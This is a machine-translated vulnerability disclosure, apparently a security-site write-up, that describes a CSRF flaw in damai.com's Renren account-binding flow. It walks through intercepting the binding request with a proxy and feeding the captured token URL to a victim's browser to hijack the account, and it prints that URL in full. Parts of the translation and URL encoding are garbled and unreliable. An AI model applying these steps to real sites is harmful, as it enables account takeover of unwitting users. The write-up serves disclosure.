Through learning http://www.bkjia.com/Article/201211/168278.html Vulnerabilities and http://www.bkjia.com/Article/201211/167652.html In this article, we conducted some tests on the authentication method for binding a third-party website and found that each website is somewhat different. However, the core idea is to obtain the access_token of a third-party website. At this time, we intercepted this request, using CSRF to allow other accounts to access this request, these accounts will be bound to your preset Third-Party website (one-to-one ), this is because most accounts with the same application cannot be bound to the same third-party website account. Briefly describe the background of the Vulnerability http://www.bkjia.com/Article/201211/167652.html The authentication information does not associate account A of website A with account C of the Third-Party website C. The intercepted authentication information can only prove that account C has the ability to access website C, therefore, Account B of website A can be bound to account C of website C after accessing the intercepted authentication information, resulting in account hijacking and exploitation. Simulate the hijacking process: 1. Prepare a new barley account, without binding any website, and hijack the account as soon as possible. See: 2. Prepare a login Renren account and another barley account. To facilitate the development of the account in the same browser, see: 3. Set proxy to paros in the browser in step 1, enable interception mode, and then enter "third-party station binding" in the barley account in step 2 ", click "bind Renren account" next to Renren ". 4. At this time, execute in a single step in paros and copy the URL at the same time: http://connect.damai.cn/RenRen/Bind.aspx?_action=GetUser&data=%7b%22PkID%22%3a0%2c%22Code%22%3a0%2c%22CreateDate%22%3a%22%5c%2fDate (1357535393150) % 5c % 2f % 22% 2c % 22 LastModifyDate % 22% 3a % 22% 5c % 2 fDate (1357535393150) % 5c % 2f % 22% 2c % 22 ThirdPartySign % 22% 3a6% 2c % 22Other_UID % 22% 3a % 22505316817% 2c % 22Other_Token % 22% 3a % 22% 7c6. 0968a42412b566c72891194dfbfdb3f3. 2592000.1360130400-505316817% 22% 2c % 22Other_TokenSecret % 22% 3 anull % 2c % 22Other_NickName % 22% 3a % 22% e6 % 9d % 9c % e8 % 85% be % 22% 2c % 22Other_Gender % 22% 3a1% 2c % 22Other_Description % 22% 3 anull % 2c % 22Oth California % 22% 2c % 22Other_Profile_Url % 22% 3 anull % 2c % 22Other_Verified % 22% 3 afalse % 2c % 22Other_CityID % 22% 3a0% 2c % 22Other_Location % 22% 3 anull % 2c % hour % 22% A0 % 2c % 22Other_FriendsCount % 22% 3a0% 2c % 22Other_StatusesCount % 22% 3a0% 2c % 22Other_FavouritesCount % 22% 3a0% 2c % 22Other_CreateDate % 22% 3a % 22% 5c % 2 fDate (-62135596800000) % 5c % 2f % 22% 2c % 22Other_LoginUser % 22% 3 anull % 2c % 22Other_Password % 22% 3 anull % 2c % 22 IsRandomAccount % 22% 3a0% 2c % 22Oauth_Version % 22% 3a2% 2c % Login % 22% 3 anull % 2c % 22Expires_In % 22% 3a % 22% 5c % 2 fDate (1360130399150) % 5c % 2f % 22% 7d, the defendant "this account has been bound by another account", so please ensure that this account is not bound or unbound .) 5. Put the URL copied in step 1 to the Web browser of the barley account to be hijacked in step 2. Result 6: The entire attack has been completed.Proof of vulnerability:Use a bound Renren account to log on to damai.com and log on to the hijacked barley account.Solution:
Refer"Youku has the risk of account hijacking"Provided repair comments